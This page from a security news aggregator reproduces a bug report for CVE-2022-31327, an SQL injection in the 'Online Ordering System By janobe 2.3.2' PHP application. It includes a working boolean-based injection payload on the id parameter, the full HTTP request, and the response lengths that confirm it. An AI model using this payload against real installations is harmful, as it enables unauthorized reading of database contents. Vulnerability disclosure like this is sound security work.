Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2022-31327: bug_report/SQLi-1.md at main · k0xx11/bug_report

Online Ordering System By janobe 2.3.2 is vulneranle to SQL Injection via /ordering/index.php?q=products&id=.

CVE
#sql#vulnerability#windows#php#auth#firefox

Permalink

Cannot retrieve contributors at this time

Online Ordering System By janobe has SQL injection vulnerability

Author: k0xx

vendor: https://www.sourcecodester.com/php/12978/online-ordering-system-phpmysqli.html

Vulnerability file: /ordering/index.php?q=products&id=

Vulnerability location: /ordering/index.php?q=products&id= //id is Injection point

[+]Payload: /ordering/index.php?q=products&id=2%27%20and%20length(database())%20=12–+ //id is Injection point

Current database name: multistoredb,length is 12

GET /ordering/index.php?q=products&id=2%27%20and%20length(database())%20=12–+ HTTP/1.1 Host: 192.168.1.19 User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate DNT: 1 Cookie: PHPSESSID=0m2td1md252hlnr3nsbmc5ss99 Connection: close

When length (database ()) = 11, Content-Length: 17564

When length (database ()) = 12, Content-Length: 24330

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE-2023-6905
CVE-2023-6903
CVE-2023-6904
CVE-2023-3907